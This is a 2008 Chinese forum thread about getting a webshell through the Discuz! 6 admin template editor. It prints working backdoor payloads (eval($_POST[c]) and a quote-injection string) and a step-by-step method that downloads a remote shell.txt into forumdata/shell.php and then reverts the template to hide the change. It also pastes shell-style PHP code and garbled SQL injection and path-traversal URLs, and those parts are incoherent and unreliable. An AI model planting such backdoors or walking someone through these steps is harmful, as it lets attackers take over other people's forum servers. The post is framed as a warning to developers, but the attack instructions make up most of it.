紧急！华夏黑客出现Discuz! 6 后台拿webshell的方法

408968722 · 发表于 2008-2-11 11:02:14

本人看不懂，也不知道是真是假，请开发团队注意！

如果后台可以在线编辑模板的话，下面的方法就可以拿webshell了：
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
Quote:

eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Quote:

";eval($_POST[c]);"

在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：
Quote:

eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");

呵呵，一个天然的后门：
PS：还有几个编辑模板的地方可以利用，和第二种方法类似。

[ 本帖最后由 408968722 于 2008-4-11 18:04 编辑 ]

408968722 · 发表于 2008-2-11 11:04:00

Powered by Discuz! 6.0.0漏洞

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");

/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
  setcookie ("adminpass", "");
  echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
  echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";
  exit;
}

if ($_POST['do'] == 'login') {
  $thepass=trim($_POST['adminpass']);
  if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 >>></a></span>";
exit;
  }
}
if (isset($_COOKIE['adminpass'])) {
  if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
  }
} else {
  loginpage();
}
}
/*===================== 验证结束 =====================*/

// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
---------------------------------------------------------------------------------------------------------------------
https://discuz.dismall.com/admin/logging.php?action=login
可以跳到其它目录
注册登录后利用

https://discuz.dismall.com/search.php?user%id=100
可以进行injection……

只能手工注射

注意:showpath里必须包含用户自己的路径
如果限制的话，还可以向上跳,向上级传文件的时候，不能直接
http://www. https://discuz.dismall.com/user/up/_id=../../....../(注射语句)
就包含用户路径
https://discuz.dismall.com/member.php ... rNumber=1402257EE8F
不然不能进行注射。

文件漏洞代码如下
<?
define('__SYSTEM_ROOT', '');
include dirname(__FILE__).'/framework_gb/framework.php';

using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Page.Page');
using('System.Smarty.Smarty');
using('System.Functions.Functions');

require_once __SYSTEM_ROOT."global.php";
require_once __SYSTEM_ROOT."vars.php";

$db=new stdClass();

$db=$Data->getDB();
/*

echo '<pre>';
print_r($Data);
*/
?>
可以直接注射,拿到后台密码。

408968722 · 发表于 2008-2-11 11:07:22

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Dz 0day by Jackal</title>
<SCRIPT LANGUAGE="JavaScript">

</SCRIPT>
</head>
<style>BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}
TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}
.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}
.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}
.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}
input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px;BORDER-RIGHT-WIDTH: 1px; color: #000000;}
textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}
tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}
td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}
.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}
.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}
</style>
<body>
<SCRIPT LANGUAGE="JavaScript">

</SCRIPT>
</body></html>

纳米 · 发表于 2008-2-11 18:21:43

如果能编辑模板
为何不直接挂马呢?
莫非dz处理了? 我很多年前就那样做了

纳米 · 发表于 2008-2-11 18:45:14

只要是dz的模板编辑原理, 只要能编辑模板, 无论是以前, 现在, 还是以后的dz版本, 全部可以搞定, 方便快捷！

1. 随便选择一个模板
2. 找一个空间上传一个wehsehll, 假定其地址为http://xx/shell.txt
3. 在任意一个位置输入:

{eval copy('http://xx/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}

复制代码

4. 保存, 刷新Cache
5. 访问该模板所属的php
6. 把模板改回原来的样子

大功告成, 可以访问/forumdata/shell.php了

sw08 · 发表于 2008-2-11 18:51:35

有空看看我刚修改完的：https://discuz.dismall.com/thread-850038-1-1.html

菜鸟都会用

纳米 · 发表于 2008-2-11 19:04:08

原帖由 sw08 于 2008-2-11 06:51 PM 发表
有空看看我刚修改完的：https://discuz.dismall.com/thread-850038-1-1.html

菜鸟都会用

很好...只是来讽刺一下那些无聊的黑客

		自动登录	找回密码
密码			立即注册

紧急！华夏黑客出现Discuz! 6 后台拿webshell的方法

Powered by Discuz! 6.0.0漏洞

Discuz! pm.php注入的EXP源码

纳米版后台编辑模板得到WebShell法

回复 5# 纳米的帖子

紧急！华夏黑客出现Discuz! 6 后台拿webshell的方法

Powered by Discuz! 6.0.0漏洞

Discuz! pm.php注入的EXP源码

纳米版 后台编辑模板得到WebShell法

回复 5# 纳米 的帖子

纳米版后台编辑模板得到WebShell法

回复 5# 纳米的帖子